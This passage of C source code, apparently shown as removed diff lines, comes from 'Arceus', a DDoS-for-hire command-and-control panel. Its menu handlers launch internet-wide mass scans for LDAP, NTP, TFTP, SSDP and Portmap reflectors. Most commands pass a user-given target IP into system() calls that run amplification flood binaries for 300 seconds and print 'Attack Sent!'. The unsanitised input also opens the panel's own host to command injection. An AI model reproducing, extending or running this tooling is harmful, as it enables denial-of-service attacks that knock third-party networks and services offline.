- sprintf(staff_cmd1, "\e[91m╔═══════════════════════════════════════════════╗\r\n\e[91m║ \e[91mArceus I \e[91m- \e[91mAdmin commands \e[91m- \e[91mAdmin Tools \e[91m║\r\n\e[91m╠═══════════════════════════════════════════════\e[91m╣\r\n\e[91m║ \e[91m.adduser \e[91m[\e[91mUsername\e[91m] \e[91m[\e[91mPassword\e[91m] \e[91m[\e[91mAdmin\e[91m/\e[91mnormal\e[91m] \e[91m║\r\n\e[91m║ \e[91m.bots \e[91m[\e[91mShows a list of connected devices\e[91m] ║\r\n\e[91m║ \e[91m.scan \e[91m[\e[91mStarts SSH Mass-Scan\e[91m] ║\r\n\e[91m║ \e[91m.install \e[91m[\e[91mInstalls all needed IPHM Scripts\e[91m] ║\r\n\e[91m║ \e[91m.scanner \e[91m[\e[91mShows a page of available Scanners\e[91m] ║\r\n\e[91m║ \e[91m.ban\e[91m [\e[91mIP\e[91m] - \e[91mBans username by IP\e[91m ║\r\n\e[91m╚═══════════════════════════════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, staff_cmd1, strlen(staff_cmd1), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- pthread_create(&title, NULL, &arceus_title_creator, sock); // Use Pthread, To Broadcast Signal, MSG_NOSIGNAL Should Be == 0
- while(1)
- {
- sprintf(arceus, "\e[91m[\e[91m%s\e[91m@\e[91mArceus\e[91m]\e[38;5;154m$\e[91m ", accounts[find_line].username, arceus_buffer_size); // User Input - Hostname
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- break; // Terminate Connection.. Reinstate All Functions.
- }
- continue; // Let Us Continue.. We Are Nearly There..
- }
- if(strstr(arceus_buffer_size, ".tools") || strstr(arceus_buffer_size, ".TOOLS") || strstr(arceus_buffer_size, ".tool") || strstr(arceus_buffer_size, ".TOOL")) // Display Menu - Tools
- {
- pthread_create(&title, NULL, &arceus_title_creator, sock);
- char tool1 [5000]; // Char Every Line For Output Communication
- sprintf(tool1, " \e[91m╔═════════════════════════════════════╗\r\n \e[91m║ \e[91mArceus I \e[91m- \e[91mUser Tools \e[91m- \e[91mTool CmDs \e[91m║\r\n \e[91m╠═════════════════════════════════════╣\r\n \e[91m║ \e[91miplookup \e[91m[\e[91mIP\e[91m] - \e[91mIP Geolocation \e[91m║\r\n \e[91m║ \e[91mportscan \e[91m[\e[91mIP\e[91m] - \e[91mPortScanner \e[91m║\r\n \e[91m║ \e[91mresolve \e[91m[\e[91mHOST\e[91m] - \e[91mHostname Resolver \e[91m║\r\n \e[91m╚═════════════════════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, tool1, strlen(tool1), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- pthread_create(&title, NULL, &arceus_title_creator, sock);
- while(1)
- {
- sprintf(arceus, "\e[91m[\e[91m%s\e[91m@\e[91mArceus\e[91m]\e[38;5;154m$\e[91m ", accounts[find_line].username, arceus_buffer_size); // User Input - Hostname
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // / Each Line Set on [MSG_NOSIGNAL] - Broadcast
- break; // Terminate Function Once Again, We Need More Stability..
- }
- continue;
- }
- if (strstr(arceus_buffer_size, ".ssh on") || strstr(arceus_buffer_size, ".SSH ON")) // System Command Function -- [TESTING HERE]
- {
- if(strcmp(Admin, accounts[find_line].identification_type) == 0) // Check If User Is Admin
- {
- char command[50];
- trim_removev2(command);
- strcpy(command, "python scripts/scan.py" );
- system(command);
- sprintf(arceus, "\e[91mStarting SSH Mass-Scan!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else
- {
- sprintf(arceus, "\e[91mOwners Only!!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1); // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- }
- if (strstr(arceus_buffer_size, ".lds on") || strstr(arceus_buffer_size, ".LDS ON")) // System Command Function -- [TESTING HERE]
- {
- if(strcmp(Admin, accounts[find_line].identification_type) == 0) // Check If User Is Admin
- {
- char command[50];
- trim_removev2(command);
- strcpy(command, "./amp/scanners/ldapscan 0.0.0.0 255.255.255.255 amp/lists/ldap.txt 2 1ms" );
- system(command);
- sprintf(arceus, "\e[91mStarting LDAP Mass-Scan!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else
- {
- sprintf(arceus, "\e[91mOwners Only!!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1); // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- }
- if (strstr(arceus_buffer_size, ".nts on") || strstr(arceus_buffer_size, ".NTS ON")) // System Command Function -- [TESTING HERE]
- {
- if(strcmp(Admin, accounts[find_line].identification_type) == 0) // Check If User Is Admin
- {
- char command[50];
- trim_removev2(command);
- strcpy(command, "./amp/scanners/ntpscan 0.0.0.0 255.255.255.255 amp/lists/ntp.txt 2 1ms" );
- system(command);
- sprintf(arceus, "\e[91mStarting NTP Mass-Scan!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else
- {
- sprintf(arceus, "\e[91mOwners Only!!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1); // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- }
- if (strstr(arceus_buffer_size, ".tfs on") || strstr(arceus_buffer_size, ".TFS ON")) // System Command Function -- [TESTING HERE]
- {
- if(strcmp(Admin, accounts[find_line].identification_type) == 0) // Check If User Is Admin
- {
- char command[50];
- trim_removev2(command);
- strcpy(command, "./amp/scanners/tftpscan 0.0.0.0 255.255.255.255 amp/lists/tftp.txt 2 1ms" );
- system(command);
- sprintf(arceus, "\e[91mStarting TFTP Mass-Scan!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else
- {
- sprintf(arceus, "\e[91mOwners Only!!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1); // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- }
- if (strstr(arceus_buffer_size, ".pos on") || strstr(arceus_buffer_size, ".POS ON")) // System Command Function -- [TESTING HERE]
- {
- if(strcmp(Admin, accounts[find_line].identification_type) == 0) // Check If User Is Admin
- {
- char command[50];
- trim_removev2(command);
- strcpy(command, "./amp/scanners/portmapscan 1.1.1.1 255.255.255.255 amp/lists/portmap.txt 2 1ms" );
- system(command);
- sprintf(arceus, "\e[91mStarting PORTMAP Mass-Scan!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else
- {
- sprintf(arceus, "\e[91mOwners Only!!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1); // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- }
- if (strstr(arceus_buffer_size, ".sds on") || strstr(arceus_buffer_size, ".SDS ON")) // System Command Function -- [TESTING HERE]
- {
- if(strcmp(Admin, accounts[find_line].identification_type) == 0) // Check If User Is Admin
- {
- char command[50];
- trim_removev2(command);
- strcpy(command, "./amp/scanners/ssdpscan 1.1.1.1 255.255.255.255 amp/lists/ssdp.txt 2 1ms" );
- system(command);
- sprintf(arceus, "\e[91mStarting SSDP Mass-Scan!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else
- {
- sprintf(arceus, "\e[91mOwners Only!!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1); // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- }
- if (strstr(arceus_buffer_size, ".ban") || strstr(arceus_buffer_size, ".BAN")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "iptables -A INPUT -s %s -j DROP", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, "\e[91mIP:\e[91m[\e[91m%s\e[91m] \e[91mBanned!\r\n", iptarget);
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".ldap") || strstr(arceus_buffer_size, ".LDAP")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\x1b[91m[\x1b[91mArceus\x1b[91m] - \x1b[91mUser\x1b[91m:[\e[38;5;82m%s\x1b[91m] - \x1b[91mMethod\x1b[91m:[\e[38;5;82mLDAP\x1b[91m] \x1b[91mIP/Port\x1b[91m:[\e[38;5;82m%s\x1b[91m] \x1b[91mThreads\x1b[91m:[\e[38;5;82m2\x1b[91m] \x1b[91mPPS\x1b[91m:[\e[38;5;82mMAX\x1b[91m] \x1b[91mTime\x1b[91m:[\e[38;5;82m300\x1b[91m]'; echo -e '\x1b[91m[\x1b[91mArceus\x1b[91m] - \x1b[91mUser\x1b[91m:[\e[38;5;82m%s\x1b[91m] - \x1b[91mMethod\x1b[91m:[\e[38;5;82mLDAP\x1b[91m] \x1b[91mIP/Port\x1b[91m:[\e[38;5;82m%s\x1b[91m] \x1b[91mThreads\x1b[91m:[\e[38;5;82m2\x1b[91m] \x1b[91mPPS\x1b[91m:[\e[38;5;82mMAX\x1b[91m] \x1b[91mTime\x1b[91m:[\e[38;5;82m300\x1b[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/reflection/ldap/ldap %s amp/methods/layer4/v1/reflection/ldap/ldap.txt 2 -1 300\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m ║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mLDAP \x1b[91m ║ \x1b[91mTime:\x1b[91m \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-LDAP\x1b[91m ║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n", iptarget);
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- /*
- if (strstr(arceus_buffer_size, ".ldap") || strstr(arceus_buffer_size, ".LDAP")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char iptime[5000]; // Char Every Line For Output Communication
- char *tokenn = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptime, sizeof(iptime), "%s", tokenn+strlen(tokenn)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptime); // Trim [iptime]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./ldap %s 62141 ldap.txt 2 -1 %s", iptarget, iptime); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, "Test Function Activated, IP : %s - Time : %s", iptarget, iptime);
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- */
- if (strstr(arceus_buffer_size, ".ntp") || strstr(arceus_buffer_size, ".NTP")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mNTP\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mNTP\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/reflection/ntp/ntp %s amp/methods/layer4/v1/reflection/ntp/ntp.txt 2 -1 300\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \x1b[91m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mNTP \x1b[91m║ \x1b[91mTime\x1b[91m: \x1b[91m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-NTP \x1b[91m║ \x1b[91mThreads\x1b[91m: \x1b[91m2\r\n\x1b[91m╚══════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".ssdp") || strstr(arceus_buffer_size, ".SSDP")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mSSDP\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mSSDP\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/reflection/ssdp/ssdp %s amp/methods/layer4/reflection/ssdp/ssdp.txt 2 -1 300\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mSSDP \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-SSDP \x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n", iptarget);
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".tftp") || strstr(arceus_buffer_size, ".TFTP")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mTFTP\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mTFTP\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/reflection/tftp/tftp %s amp/methods/layer4/v1/reflection/tftp/tftp.txt 2 -1 300\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mTFTP \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-TFTP \x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n", iptarget);
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".portmap") || strstr(arceus_buffer_size, ".PORTMAP")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mPORTMAP\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mPORTMAP\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/reflection/portmap/portmap %s amp/methods/layer4/v1/reflection/portmap.txt 2 -1 300\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mPORTMAP \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-PMAP \x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n", iptarget);
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".sentinel") || strstr(arceus_buffer_size, ".SENTINEL")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mSENTINEL\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mSENTINEL\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/reflection/sentinel/sentinel %s amp/methods/layer4/v1/reflection/sentinel.txt 2 -1 300\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mSENTINEL \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-SNTNL\x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".netbios") || strstr(arceus_buffer_size, ".NETBIOS")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mNETBIOS\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mNETBIOS\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/reflection/netbios/netbios %s amp/methods/layer4/v1/reflection/netbios.txt 2 -1 300\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mNETBIOS \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-NTBIS\x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".chargen") || strstr(arceus_buffer_size, ".CHARGEN")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mCHARGEN\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mCHARGEN\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/reflection/chargen/chargen %s amp/methods/layer4/v1/reflection/chargen.txt 2 -1 300\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mCHARGEN \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-CHRGN\x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".mssql") || strstr(arceus_buffer_size, ".MSSQL")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
